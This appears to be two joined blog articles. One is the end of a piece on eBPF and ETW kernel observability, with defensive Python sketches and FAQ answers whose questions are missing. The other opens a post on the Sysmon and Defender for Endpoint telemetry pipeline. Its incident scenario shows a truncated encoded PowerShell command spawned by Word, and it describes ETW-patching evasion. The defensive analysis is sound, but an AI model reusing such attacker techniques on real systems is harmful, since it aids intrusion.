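A minimal sketch of that SIEM-side contract: one rule that matches on Event ID and field, applied unchanged to records from both platforms. The two XML records are hand-written and trimmed for illustration; the provider names, paths, and field values are assumptions, not captured output. The parser strips XML namespaces so the rule sees the same element names however a producer serializes them.

```python
import xml.etree.ElementTree as ET

# Illustrative, trimmed Sysmon-style records; not captured output.
WINDOWS_EVENT = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="ParentImage">C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE</Data>
  </EventData>
</Event>"""

LINUX_EVENT = r"""<Event>
  <System><Provider Name="Linux-Sysmon"/><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">/usr/bin/curl</Data>
    <Data Name="ParentImage">/usr/bin/bash</Data>
  </EventData>
</Event>"""


def _local(tag: str) -> str:
    """Drop the '{namespace}' prefix ElementTree adds to namespaced tags."""
    return tag.rsplit("}", 1)[-1]


def parse(xml_text: str) -> dict:
    """Flatten a Sysmon-style event into {'EventID': int, field: value, ...}."""
    record = {}
    for elem in ET.fromstring(xml_text).iter():
        name = _local(elem.tag)
        if name == "EventID":
            record["EventID"] = int(elem.text)
        elif name == "Data":
            record[elem.get("Name")] = elem.text or ""
    return record


def rule_process_create_from(record: dict, parents: tuple) -> bool:
    """Platform-agnostic rule: EID 1 whose ParentImage ends with a listed suffix.

    `parents` holds lowercase suffixes such as '\\winword.exe' or '/bash'.
    """
    if record.get("EventID") != 1:
        return False
    return record.get("ParentImage", "").lower().endswith(parents)
```

Only `parse` knows the records came from two different producers; the rule never branches on platform.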

The consumer stack has converged at the surface layer: XML configs, Event IDs, EDR vendor APIs. The substrate has not, and the open problems in the next section are what stands in the way.

9. Open Problems and the Frontier

What can we not do yet? Four open problems will shape the next five years of kernel observability.

9.1 Verifier-driven false rejection

Programs that PREVAIL and a human can both prove safe still get rejected by the Linux verifier, typically with a cryptic complexity-limit error such as "BPF program is too large. Processed 1000001 insn". EDR vendors end up fighting the verifier rather than writing the program they want. The workarounds are real and ugly: __attribute__((noinline)) annotations to force the compiler to emit function boundaries the verifier can prune around, explicit bound assertions that re-derive properties the compiler already knows, bpf_loop() to externalize loops the verifier cannot trace. The HotOS 2023 thesis is exactly that this is not a bug -- it is a property of any heuristic verifier under the soundness-completeness-scalability triangle. The completeness leg is the one the Linux verifier gives up first, every time.
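A toy interval-domain checker shows how a sound but incomplete verifier rejects a safe access, and why an explicit bound check gets it accepted. This is a deliberately tiny Python illustration, not the Linux verifier or PREVAIL: the `Interval` class, the 16-entry array, and the `check_access` helper are hypothetical. Each register is tracked only as a range, so the relation `y == 15 - x` that makes `x + y` safe is lost.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Interval:
    lo: int
    hi: int

    def __add__(self, other: "Interval") -> "Interval":
        # Interval addition is sound but forgets any relation between operands.
        return Interval(self.lo + other.lo, self.hi + other.hi)

    def refine_lt(self, bound: int) -> "Interval":
        # State on the true branch of `if (v < bound)` (empty ranges not modeled).
        return Interval(self.lo, min(self.hi, bound - 1))


def check_access(index: Interval, array_len: int) -> bool:
    """Accept only if every value the index might take is in bounds."""
    return 0 <= index.lo and index.hi < array_len


ARRAY_LEN = 16
x = Interval(0, 15)   # x is known to be 0..15
y = Interval(0, 15)   # the program computed y = 15 - x; only the range survives
idx = x + y           # concretely always 15, abstractly 0..30

print(check_access(idx, ARRAY_LEN))                        # False: rejected
print(check_access(idx.refine_lt(ARRAY_LEN), ARRAY_LEN))   # True after `if (idx < 16)`
```

The redundant `if (idx < 16)` is exactly the kind of "explicit bound assertion" the text describes: it changes nothing at runtime but hands the analyzer a fact it could not derive.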

The frontier here is twofold. On one side, the verifier is becoming more capable: bounded loops, bpf_for_each_map_elem, kfuncs, and the trampoline-based attach mechanisms have all expanded what the verifier can prove. On the other side, PREVAIL's polynomial-time abstract-interpretation approach represents an alternative architectural lineage. Neither approach removes the underlying undecidability. Both make the rejection threshold higher.

9.2 Cross-OS eBPF ABI

RFC 9669 [@rfc-editor-org-rfc-rfc9669html], published in October 2024 by the IETF BPF working group, standardized the instruction set architecture for BPF programs. The RFC specifies the 64-bit instruction encoding, the semantics of the arithmetic, jump, load/store, and atomic instructions, and the conformance groups an implementation can claim. It is the cleanest cross-OS contract eBPF has ever had.
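Because the encoding is fixed, decoding a basic instruction is mechanical. A minimal Python sketch, assuming the little-endian layout and covering only the basic 8-byte slot (the 16-byte wide `lddw` form and per-opcode semantics are ignored): each instruction packs an 8-bit opcode, 4-bit destination and source registers, a signed 16-bit offset, and a signed 32-bit immediate, and the low three opcode bits select the instruction class.

```python
import struct

# Instruction classes indexed by the low three opcode bits.
CLASSES = ["LD", "LDX", "ST", "STX", "ALU", "JMP", "JMP32", "ALU64"]


def decode(slot: bytes) -> dict:
    """Decode one 8-byte basic BPF instruction (little-endian encoding)."""
    if len(slot) != 8:
        raise ValueError("a basic instruction is exactly 8 bytes")
    opcode, regs, offset, imm = struct.unpack("<BBhi", slot)
    return {
        "opcode": opcode,
        "class": CLASSES[opcode & 0x07],   # low 3 bits: instruction class
        "dst_reg": regs & 0x0F,            # low nibble on little-endian hosts
        "src_reg": regs >> 4,              # high nibble
        "offset": offset,                  # signed 16-bit
        "imm": imm,                        # signed 32-bit
    }


def decode_program(code: bytes) -> list:
    """Split a buffer of basic instructions into decoded 8-byte slots."""
    return [decode(code[i:i + 8]) for i in range(0, len(code), 8)]


# r0 = 0 ; exit   (0xb7 is ALU64|MOV|K, 0x95 is JMP|EXIT)
program = bytes.fromhex("b700000000000000" "9500000000000000")
for insn in decode_program(program):
    print(insn["class"], hex(insn["opcode"]), insn["dst_reg"], insn["imm"])
```

Nothing here names a helper, a map, or a hook; that is the boundary of what the ISA standard fixes.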

What the RFC does not standardize: helpers, map types, and hook semantics. Those remain Linux-defined-in-practice. The eBPF-for-Windows helper set is a subset, with extensions for Windows-specific concepts. The FreeBSD and illumos ports have their own subsets. A single observability agent that runs everywhere needs more than a standardized ISA; it needs a standardized helper API and a standardized hook taxonomy. Today, EDR vendors writing cross-OS agents ship two distinct programs that share a build system and not much else.

Note: RFC 9669 is the ISA standard. It defines what BPF bytecode looks like and what each instruction does. It does not define which helpers a program can call, what the map types are, or what hooks the program can attach to. Those are the parts that vary between Linux, Windows, and the BSDs. Standardizing them is more of a committee problem than a research problem -- a meaningful subset is achievable; a full superset probably is not.

9.3 ETW evasion at the trust boundary

The user-mode EtwEventWrite patching attack class is roughly 2020-vintage but has not gone away. The kernel-emitted Microsoft-Windows-Threat-Intelligence provider is the current best mitigation: kernel signals cannot be patched from user mode, so an attacker who silences user-mode emissions still trips kernel-only signals on memory-protection changes, image load, and remote thread creation.

The deeper structural question is whether any user-mode primitive can ever be tamper-resistant under hostile user-mode code. The short answer is no, which is why defenders keep moving the trust boundary into the kernel -- through PPL, through LSM, through signed drivers. Linux shows the same pattern: telemetry that must resist hostile user-mode code has to be generated inside the kernel, which is why the LSM hooks are the part of the eBPF hook surface that matters most for EDR.

9.4 Hot-path overhead at scale

Production environments routinely run Falco, Cilium, and a vendor EDR on the same kernel, each attaching probes to the same hook. The marginal cost of an eBPF kprobe on a five-million-events-per-second syscall is not zero, and the cost multiplies when three different agents attach three different programs to the same hook.

The current partial mitigations are real. fentry/fexit plus the BPF trampoline removed the per-attach trap-frame cost. kprobe.multi, added in Linux 5.18, lets a single program attach to many kernel functions in one operation instead of one kprobe per function. BPF-link iteration lets one agent observe what another has attached. But none of these compose perfectly: fentry programs from three different vendors on the same function are dispatched from one shared trampoline, yet every program still runs on every hit, so the per-event cost still grows with the number of agents. How much of that work can be shared is attach-type-specific.

The multi-agent attach problem is the eBPF version of a familiar systems issue: when N independent consumers each install their own instrumentation at the same point, the cost is roughly N times the cost of one. Sharing the dispatch mechanism removes part of that cost, but not the work inside each consumer's program. Whether the per-program cost can be made cheap for fentry attaches across LSM hooks is an open implementation question.
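A back-of-the-envelope model makes the scaling concrete. The numbers are placeholders, not measurements: the 5 million events per second matches the example above, while the 40 ns dispatch cost and 100 ns per-program cost are assumed round figures, and real costs depend on the program body and the microarchitecture. The model charges a dispatch cost per hit (once if shared, once per agent if not) plus one program body per attached agent.

```python
def cores_consumed(events_per_sec: float, agents: int, program_ns: float,
                   dispatch_ns: float, shared_dispatch: bool) -> float:
    """CPU cores burned by instrumentation on one hot hook.

    Each hit pays the dispatch cost once if dispatch is shared, or once per
    agent if each agent brings its own; every agent's program body always runs.
    """
    dispatches = 1 if shared_dispatch else agents
    ns_per_hit = dispatches * dispatch_ns + agents * program_ns
    return events_per_sec * ns_per_hit / 1e9


if __name__ == "__main__":
    RATE = 5_000_000   # events/s on the hot syscall (from the text)
    DISPATCH_NS = 40   # assumption: per-hit dispatch cost
    PROGRAM_NS = 100   # assumption: per-program body cost
    for agents in (1, 3, 10):
        own = cores_consumed(RATE, agents, PROGRAM_NS, DISPATCH_NS, shared_dispatch=False)
        shared = cores_consumed(RATE, agents, PROGRAM_NS, DISPATCH_NS, shared_dispatch=True)
        print(f"{agents:2d} agents: {own:.2f} cores (own dispatch), {shared:.2f} cores (shared)")
```

With these placeholder figures, three agents cost 2.1 cores with separate dispatch and 1.7 with shared dispatch: sharing trims the dispatch term, but the program-body term still grows linearly with the number of agents.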

The frontier of kernel observability is not "build a new substrate." It is "make the existing substrates compose under multi-tenant production load."

10. Two Generations

Return to the SOC analyst from section 1. The Sysmon Operational channel looks the same on both hosts. Now you know why -- and also why the similarity is a deliberate engineering choice rather than a coincidence.

ETW is mature, covers all of Windows, and is emission-only. It is a catalog of events. Every Windows subsystem registers a provider, every provider declares a manifest, every event has a stable schema. A consumer that knows the manifest knows what to expect. The trust boundary is the kernel-mode driver signing model. The cost is that aggregation, sampling, and any programmable filtering happen in user space, after the event has crossed the boundary.

eBPF is programmable, filters and aggregates in-kernel, and has a verifier. It is a language for asking questions of the kernel, not a catalog of pre-defined answers. The trust boundary is the verifier, which is a research-grade static analyzer running as kernel code. Linux's verifier shipped four widely-disclosed soundness bugs in four years. PREVAIL answers that record with a soundness-first design and a more conservative completeness story. The trade-offs are not finished.

eBPF-for-Windows is the convergence experiment. The native mode -- PREVAIL plus bpf2c plus MSVC plus a signed .sys driver -- is the first cross-OS-portable kernel-observability primitive. As of 2026 it covers a networking subset of hooks, not the full Linux surface. That gap is not architectural; it is a list of hooks Microsoft has not yet exposed. The pattern is generalizable: cross-OS observability lives in the verifier, not in the runtime, and each OS lifts verified bytecode into its own trust model.

The generation gap is literal. ETW (2000) is an event bus. eBPF (2014) is a programmable kernel substrate. Both will still ship in 2035. Both will still be the right answer for some workloads. The interesting work for the next decade is in the convergence layer -- helper-API standardization, hook-point taxonomy alignment, verifier completeness -- and in the multi-tenant production engineering that makes ten different agents on one kernel cheaper than ten times one agent.

Key idea: Kernel observability has matured from event emission to programmable kernel computation. That generation gap is why eBPF-for-Windows -- a small, work-in-progress project -- is one of the more architecturally significant operating-system-telemetry events of the last decade. The portable abstraction is not the runtime. It is the static analyzer.

No. As of 2026, eBPF for Windows [@github-com-for-windows] covers a networking-heavy subset of hooks -- XDP, BIND, SOCK_OPS, SOCK_ADDR, and process creation and exit -- and is not yet a substitute for Defender-grade kernel telemetry. ETW remains the canonical Windows observability substrate. The convergence between the two is real for the networking subset, and is the work-in-progress for the rest of the surface.

Because it is a heuristic abstract interpreter on a Turing-complete ISA, and Rice's theorem says no such verifier can be simultaneously sound, complete, and decidable. Real verifiers approximate all three, and the soundness leg fails whenever the abstract state drifts from what the program can actually do: wrong 32-bit bounds tracking in CVE-2020-8835 [@nvd-nist-gov-2020-8835] and CVE-2021-3490 [@nvd-nist-gov-2021-3490], pointer arithmetic on a nullable pointer type in CVE-2022-23222 [@nvd-nist-gov-2022-23222], and incorrect state pruning in CVE-2023-2163 [@nvd-nist-gov-2023-2163].

For the networking subset (XDP, SOCK_ADDR, SOCK_OPS, BIND), yes -- eBPF for Windows [@github-com-for-windows] is source-compatible with Linux eBPF for those hooks. For arbitrary kprobes or LSM hooks, no -- those hooks are Linux-internal and eBPF for Windows does not expose equivalents. Cross-platform agents typically ship two binaries that share a build system.

Since Linux 5.16 (January 2022) [@kernel-org-bpf-indexhtml], the upstream default (`CONFIG_BPF_UNPRIV_DEFAULT_OFF=y`) sets `kernel.unprivileged_bpf_disabled=2`: unprivileged loading is off, though an administrator can still set it back to 0 at runtime. Production EDRs run with `CAP_BPF` plus `CAP_PERFMON` or root. Leaving unprivileged eBPF enabled was the entry point for several verifier CVEs, so the conservative default is correct.

A kprobe is a runtime breakpoint mechanism: the kernel patches a trap instruction at the target address, and the trap handler invokes the attached eBPF program. fentry uses the BPF trampoline [@lore-kernel-org-1-astkernelorg] -- a small JIT-emitted dispatcher that calls attached BPF programs with a direct call, avoiding the retpoline penalty an indirect dispatch would pay on Spectre-mitigated kernels. Starovoitov's framing: *"practically zero overhead"* for fentry, relative to the kprobe trap-frame cost.

No. ETW sessions filter by provider, keyword, and level, plus, since Windows 8.1, fixed-form filters on event ID, process ID, executable name, and simple payload predicates. None of that is programmable: any per-event computation -- counting, sampling, stack-trace folding, downsampling -- runs in user mode on the consumer side, after the event has crossed the kernel-user boundary. The lack of a programmable in-kernel filter language is the structural reason eBPF can do things ETW cannot, like aggregate ten million `vfs_read` calls per second into a histogram without saturating the wire.

Sysmon for Linux [@github-com-microsoft-sysmonforlinux] replaces the ETW back end with eBPF kprobes via Microsoft's `SysinternalsEBPF` library. The XML configuration schema, Event IDs, and XML event format are preserved (events land in syslog rather than a Windows event channel), so a SIEM consumer sees the same telemetry schema from either OS. It is the production demonstration that ETW and eBPF can be made surface-equivalent to a consumer.
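The keyword-and-level gate mentioned in the ETW filtering answer is simple enough to state as a predicate. A minimal Python sketch of the documented `EnableTraceEx2` matching rules, simplified: it models only the session level, `MatchAnyKeyword`, and `MatchAllKeyword`, ignores the Windows 8.1+ filter descriptors and any provider-specific handling of a zero `MatchAnyKeyword`, and the keyword bit values in the example are hypothetical.

```python
def etw_event_enabled(event_level: int, event_keyword: int,
                      session_level: int, match_any: int, match_all: int) -> bool:
    """Simplified ETW session gate (level plus keywords only)."""
    if event_level > session_level:
        return False                                   # too verbose for this session
    if event_keyword == 0:
        return True                                    # keyword-less events pass
    if (event_keyword & match_any) == 0:
        return False                                   # needs at least one 'any' bit
    return (event_keyword & match_all) == match_all    # and every 'all' bit


# Hypothetical provider keywords, for illustration only.
KW_PROCESS = 0x10
KW_NETWORK = 0x20

print(etw_event_enabled(4, KW_PROCESS, 4, KW_PROCESS | KW_NETWORK, 0))
```

Everything the predicate sees is header metadata; counting, sampling, or aggregating across events cannot be expressed at this gate and falls to the consumer.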

From `cmd.exe` to a Kusto Row in 90 Seconds: How Sysmon and Defender for Endpoint Actually Work

noreply@paragmali.com (Parag Mali) — Wed, 13 May 2026 00:00:00 GMT

Modern Windows EDR is a seven-layer production pipeline. A kernel callback fires, a user-mode aggregator labels the event, an ETW publisher (Sysmon) or a TLS-pinned cloud forwarder (`SenseCncProxy.exe`) ships it, and within seconds the event surfaces as a row in a Kusto table that the analyst queries with KQL. Sysmon (Russinovich and Garnier, August 2014) is the configurable kernel-callback-then-publish reference: twenty-nine event IDs, three canonical configurations (SwiftOnSecurity, the post-rename `NextronSystems/sysmon-config`, and `olafhartong/sysmon-modular`), Antimalware-PPL hardening since v15 in June 2023. Microsoft Defender for Endpoint (Windows Defender ATP preview March 2016, MDE rename September 2020, Microsoft Defender XDR portal late 2023) is the commercial cloud-correlated counterpart: `MsSense.exe` runs as Antimalware-PPL, shares the `WdFilter.sys` / `WdBoot.sys` / `WdNisDrv.sys` Defender Antivirus kernel surface, and lands events in six `Device*` Advanced Hunting tables with 30-day in-portal retention, extended via the Microsoft Sentinel Defender XDR connector. For MDE-licensed shops with a detection-engineering team, the community pattern is Hartong's `sysmonconfig-mde-augment.xml` -- Sysmon as a complement, not a duplicate. The pipeline's four structural ceilings (pre-driver-load horizon, observation-vs-enforcement latency, MDE schema truncation, kernel-mode adversary primitive) are documented and unclosed; FalconForce's 2022 CVE-2022-23278 disclosure and InfoGuard Labs' 2025 certificate-pinning bypass bookend an adversarial arc the field has not yet ended.

1. From `cmd.exe` to a Kusto Row in Ninety Seconds

At 9:14 a.m. on a Monday, a SOC analyst named Maya watches a DeviceProcessEvents row light up in the Advanced Hunting console of Microsoft Defender XDR. The FileName is powershell.exe. The ProcessCommandLine reads powershell.exe -enc JABzAD0A.... The InitiatingProcessFileName is WINWORD.EXE. The Timestamp is three seconds ago [@deviceprocessevents-table].

By 9:15:44 Maya has pivoted to DeviceNetworkEvents, found an outbound connection initiated by that same PowerShell process to a previously-unknown IP on TCP/443, clicked Isolate device on the device page, and the endpoint is off the network. Ninety seconds, end to end. Email triage of the original message; a quarantine on the inbound .docm; and -- by the time the user's coffee has cooled -- a brand-new IOC in the tenant's custom indicator list.

This article is the rewind. We walk Maya's ninety seconds backwards through the seven pipeline layers that made the triage possible -- starting in ring zero, ending in the KQL query you can copy into your own tenant -- and along the way we answer the question every SOC manager has asked at least once: do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone?

The seven layers

Maya is looking at a single Kusto row. Behind that row sit seven distinct software components, each of which can fail independently:

A kernel callback fired inside the nt!PspInsertProcess path on the target machine the instant WINWORD.EXE called CreateProcessW to spawn powershell.exe. The callback handler lives inside WdFilter.sys (Defender Antivirus's filter driver) and inside SysmonDrv.sys if Sysmon is also installed [@pssetcreateex-msdn].
A user-mode aggregator -- MsSense.exe for Defender for Endpoint, or Sysmon.exe (the service) for Sysmon -- received the structured callback notification, enriched it with parent-process state, file hashes, signature information, and identity data, and decided whether the event was worth shipping [@mde-ms-learn][@sysmon-ms-learn].
An ETW publisher -- in Sysmon's case the Microsoft-Windows-Sysmon provider -- emitted the event onto the operating system's tracing bus, and the event landed in the Microsoft/Windows/Sysmon/Operational event log [@sysmon-ms-learn].
A cloud forwarder -- SenseCncProxy.exe -- carried the Defender payload over certificate-pinned TLS to the regional Defender XDR ingest endpoint [@falconforce-2022].
A cloud sensor pipeline in Microsoft's regional datacenter (the US for US tenants, the EU for European tenants, the UK for UK tenants) wrote the event into the Advanced Hunting Kusto cluster [@advanced-hunting-overview][@ms-server-endpoints-learn].
A Kusto table -- DeviceProcessEvents, roughly fifty columns wide -- made the event queryable within seconds, logically joinable to its siblings (DeviceNetworkEvents, DeviceFileEvents, DeviceRegistryEvents, DeviceImageLoadEvents, DeviceEvents) [@deviceprocessevents-table].
A KQL query Maya wrote, or one of Microsoft's built-in detection rules, matched the process row's ProcessId to the network row's InitiatingProcessId on the same DeviceId, surfaced the C2 callback inside a ninety-second window, and put the device-isolation button on her screen [@advanced-hunting-overview][@sentinel-xdr-connector].
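The final layer's join can be sketched outside Kusto to show the matching logic. A minimal Python sketch over hand-made rows: the column names (`DeviceId`, `Timestamp`, `FileName`, `ProcessId`, `InitiatingProcessFileName`, `InitiatingProcessId`, `RemoteIP`, `RemotePort`) follow the Advanced Hunting schema, but every row value is invented, and pairing the spawned process's `ProcessId` with the network row's `InitiatingProcessId` inside a 90-second window is an illustrative choice, not Microsoft's detection logic.

```python
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=90)

# Invented rows; column names follow the Advanced Hunting schema.
process_events = [
    {"DeviceId": "dev-1", "Timestamp": datetime(2026, 5, 11, 9, 14, 0),
     "FileName": "powershell.exe", "ProcessId": 4242,
     "InitiatingProcessFileName": "WINWORD.EXE", "InitiatingProcessId": 1111},
]
network_events = [
    {"DeviceId": "dev-1", "Timestamp": datetime(2026, 5, 11, 9, 14, 20),
     "InitiatingProcessId": 4242, "RemoteIP": "203.0.113.7", "RemotePort": 443},
    # Same PID on a different device: must not match.
    {"DeviceId": "dev-2", "Timestamp": datetime(2026, 5, 11, 9, 14, 20),
     "InitiatingProcessId": 4242, "RemoteIP": "198.51.100.9", "RemotePort": 443},
]


def office_spawned_callbacks(procs, conns, window=WINDOW):
    """Pair Word-spawned processes with their own outbound connections."""
    hits = []
    for p in procs:
        if p["InitiatingProcessFileName"].upper() != "WINWORD.EXE":
            continue
        for c in conns:
            same_process = (c["DeviceId"] == p["DeviceId"]
                            and c["InitiatingProcessId"] == p["ProcessId"])
            delay = c["Timestamp"] - p["Timestamp"]
            if same_process and timedelta(0) <= delay <= window:
                hits.append((p["DeviceId"], p["FileName"], c["RemoteIP"], c["RemotePort"]))
    return hits


print(office_spawned_callbacks(process_events, network_events))
```

A production query would typically also compare process creation times, because PIDs are reused on a busy host.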

Operating an EDR well -- which is what this article is about -- means knowing which layer produced which artifact, which layer can be tampered with, and which layer is the right one to fix when the row does not arrive.

Key idea: Modern Windows EDR is a seven-layer production pipeline: kernel callback, user-mode aggregator, ETW publisher (or cloud forwarder), TLS-pinned cloud transport, regional Kusto ingest, table write, KQL read. Sysmon and Microsoft Defender for Endpoint are two implementations of the same seven layers, with different design philosophies at every layer.

Why two products, not one

Sysmon and Defender for Endpoint were not designed as a pair. They evolved as competing answers to the same problem -- when prevention fails, what evidence do you give the responder? -- on the same operating system, with the same kernel-callback APIs underneath, and with the same Event Tracing for Windows (ETW) bus as the transport layer in the middle. They converged on a shared trust model only in 2023, when both products began running as protected processes [@sysmon-ms-learn][@falconforce-2022].

That convergence is not coincidence. It is the consequence of a decade of architectural pressure pushing both products toward the same answer: collect at the Microsoft-sanctioned kernel-callback boundary, normalize in user mode, ship over a tamper-resistant transport, and surface to the analyst as a queryable column family. The differences are in the configuration grammar, the cloud-side enrichment, and the trust boundary at the publisher edge. The seven layers are the same. To see why, we have to start in 2014, when Sysmon shipped with three event types.

2. Twelve Years, Two Arcs, One Convergence

Anton Chuvakin, then a research VP at Gartner, named the category in July 2013. His blog post -- preserved on his personal site after Gartner deleted its analyst blogs in late 2023 -- coined the term Endpoint Threat Detection and Response (ETDR) and defined it as "tools primarily focused on detecting and investigating suspicious activities (and traces of such) other problems on hosts/endpoints" [@chuvakin-2013][@wikipedia-edr]. The "T" dropped out of the acronym within eighteen months and the field has been called EDR ever since.

Chuvakin's question -- what evidence do you give the responder when prevention fails? -- got two different answers from inside Microsoft over the next decade. One was free, configurable, and ran on every Windows machine the operator wanted to run it on. The other was commercial, cloud-correlated, and only worked if you paid for it. Both started in the same place: at the supported kernel-callback boundary that Microsoft had been steadily building out since Windows XP.

The Sysmon arc: August 2014 to March 2026

Mark Russinovich gave session HTA-T07R at RSA US 2014 -- Malware Hunting with the Sysinternals Tools -- and the methodology he taught (process-tree pivoting, autoruns enumeration, real-time monitoring of file and registry writes) had a natural conclusion: somebody should ship a Sysinternals tool that did all of that, continuously, into the Windows event log [@russinovich-rsa-2014]. The tool shipped in August 2014, written by Russinovich and Thomas Garnier, also of Microsoft. ZDNet's contemporaneous coverage captured the introduction: "Sysmon, written by Russinovich and Thomas Garnier, also of Microsoft, is the 73rd tool in the set... Note: For public release, Sysmon has been reset to version 1.00" [@zdnet-sysmon-2014]. The launch release had three event types: process create (EID 1), file-create-time change (EID 2), and network connect (EID 3).

The design philosophy is captured in a single sentence Microsoft Learn still prints on the Sysmon download page, which frames Sysmon as a publisher that refuses to do detection and refuses to hide; §4 quotes it verbatim [@sysmon-ms-learn]. That framing is the foundation of the SwiftOnSecurity-NextronSystems-Hartong configuration lineage that §5 unpacks. Every detection-engineering corpus in the Windows field -- SwiftOnSecurity's config, Florian Roth's fork, Olaf Hartong's modular system, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of that one design choice.

The version history reads as capability accretion, not architectural change. Sysmon v6 in February 2017 added registry events (EIDs 12-14), process-access (10), file-create (11), pipe events (17-18), file-create-stream-hash (15), and the ServiceConfigurationChange (16) audit of Sysmon's own settings [@sysinternals-blog-v6]. (EID 7 ImageLoad arrived earlier, in Sysmon v2.0.) Sysmon v10 in June 2019 added DNS-query observation via ETW consumption of Microsoft-Windows-DNS-Client; the v10 release date is recorded in the community-curated Sysmon Version History repository, explicitly marked "Outdated" past v11.10 because its maintainer stopped updating it [@sysmon-version-history]. v12 added ClipboardChange, and v13 added ProcessTampering. v14 in August 2022 added the first preventive event -- FileBlockExecutable (EID 27) -- making Sysmon something subtly more than a publisher [@diversenok-2022][@hartong-sysmon14-medium].

The architectural inflection landed in June 2023 with Sysmon v15, when the Sysmon service began running as a protected process. BleepingComputer's contemporaneous coverage notes that the service ran as PROTECTED_ANTIMALWARE_LIGHT and the schema bumped to 4.90 with the new FileExecutableDetected event ID 29 [@bleepingcomputer-sysmon15][@hartong-sysmon15-medium]. The Microsoft Learn page now states the change verbatim: "The service runs as a protected process, thus disallowing a wide range of user mode interactions" [@sysmon-ms-learn]. The latest published release at the time of writing is v15.2 on March 26, 2026 (per the Sysmon download page's Published by-line), with twenty-nine event types plus EID 255 (Error) [@sysmon-ms-learn].

The MDE arc: March 2016 to late 2023

Microsoft announced Windows Defender Advanced Threat Protection in a Windows Experience blog post on March 1, 2016 -- "Today, we announce the next step in our efforts to protect our enterprise customers, with a new service, Windows Defender Advanced Threat Protection" [@ms-blog-atp-mar2016]. The service was framed as a cloud-correlated detection-and-investigation layer on top of the Windows 10 sensor, "informed by anonymous information from over 1 billion Windows devices" [@ms-blog-atp-mar2016]. The 2016 product was Windows-only, in-portal, and oriented to detection and investigation only.

The Fall Creators Update in October 2017 broadened the product into prevention: "The Windows Fall Creators Update represents a new chapter in our product evolution as we offer a set of new prevention capabilities designed to stop attacks as they happen and before they have impact. This means that our service will expand beyond detection, investigation, and response, and will now allow companies to use the full power of the Windows security stack for preventative protection" [@ms-blog-atp-jun2017]. Attack Surface Reduction rules, Exploit Guard, and Application Guard joined the platform. So did the Advanced Hunting query surface in 2018 -- KQL on the same Device* tables Maya uses in §1.

The cross-platform reach arrived in March 2019 with macOS support (initially as Microsoft Defender ATP) and was extended to networked Linux and macOS discovery by February 2021 [@securityweek-defender-macos][@bleepingcomputer-defender-linux]. Two more renames followed. The most-cited came at Microsoft Ignite 2020 on September 22, 2020, when the Microsoft Security blog announced the product family rebrand: "Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection)" [@ms-unified-siem-xdr-2020]. The same post renamed Microsoft Threat Protection to Microsoft 365 Defender, O365 ATP to Microsoft Defender for Office 365, and Azure ATP to Microsoft Defender for Identity. The second came at Microsoft Ignite 2023 in November 2023, when the suite, Microsoft 365 Defender, became Microsoft Defender XDR [@defender-xdr-ms-learn][@ms-ignite-2023-blog].

The Ignite 2023 rebrand did not change the KQL substrate, the Device* schema, or the Sentinel connector contract. It is a marketing relabel on top of a stable cloud surface. Detection engineering teams kept writing queries against DeviceProcessEvents exactly as they did the day before the rename.

The configuration-lineage arc

A third arc ran in parallel with the two product arcs: the community-maintained Sysmon configurations that turned Sysmon from a kernel-callback publisher into a deployment-ready detection sensor.

The historical root is SwiftOnSecurity's sysmon-config repository, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. The README's design intent is succinct: "This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing" [@github-swiftonsecurity]. The repository remains the most-cited Sysmon-configuration starting point in the SOC industry.

Florian Roth, working under the handle @Neo23x0, forked SwiftOnSecurity's config in January 2018 (the exact creation date is now obscured by a 2021 rename -- see the sidenote below). The fork merged a backlog of community pull requests and, once Sysmon v14 shipped in 2022, added blocking-rule support and the sysmonconfig-export-block.xml variant that carries the v14+ FileBlockExecutable rules. The README states the lineage verbatim: "This is a forked and modified version of @SwiftOnSecurity's sysmon config. ... We merged most of the 30+ open pull requests" [@github-neo23x0]. The current maintainer roster lists Florian Roth, Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali.

Olaf Hartong's sysmon-modular was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository takes a different design approach: instead of one monolithic XML config, Hartong ships a per-EID-and-per-technique module library that compiles down into one of several pre-generated artifacts -- sysmonconfig.xml (default), sysmonconfig-with-filedelete.xml (default plus archive), sysmonconfig-excludes-only.xml (verbose), sysmonconfig-research.xml (super-verbose, with the warning "really DO NOT USE IN PRODUCTION!"), and the load-bearing sysmonconfig-mde-augment.xml, whose entire design intent is to fill the gaps in Defender for Endpoint's collection surface [@github-hartong-modular].

Olaf Hartong and Henri Hambartsumyan, the two FalconForce researchers who reverse-engineered Defender for Endpoint in 2022 and surfaced CVE-2022-23278, also maintain olafhartong/sysmon-modular. That dual identity is what makes the sysmonconfig-mde-augment.xml config uniquely informed: the same people who learned where MDE's collection drops or truncates what Sysmon's manifest captures also published the config that fills those gaps [@falconforce-2022][@github-hartong-modular].

The Neo23x0 repository was renamed in 2021. The current https://github.com/Neo23x0/sysmon-config URL HTTP-301s to https://github.com/NextronSystems/sysmon-config, and the GitHub REST API returns a created_at of 2021-07-24T06:19:41Z with a parent field pointing to SwiftOnSecurity/sysmon-config [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; only the organizational owner moved from Florian Roth's personal handle to his employer Nextron Systems.

By 2023, then, two product arcs and one configuration arc had converged on the same baseline: kernel callbacks (PsSetCreateProcessNotifyRoutineEx, ObRegisterCallbacks, CmRegisterCallbackEx, Filter Manager minifilters) on the input side; an Antimalware-PPL protected service on the host; an ETW or TLS-pinned cloud transport in the middle; and KQL on Device* tables on the reader side. The convergence was structural, not coincidental. To see why the arcs landed in the same place, we have to start at the kernel-callback boundary -- where Sysmon's input lives.

3. Sysmon Architecture: Kernel Collection, ETW Emission, Event Log Persistence

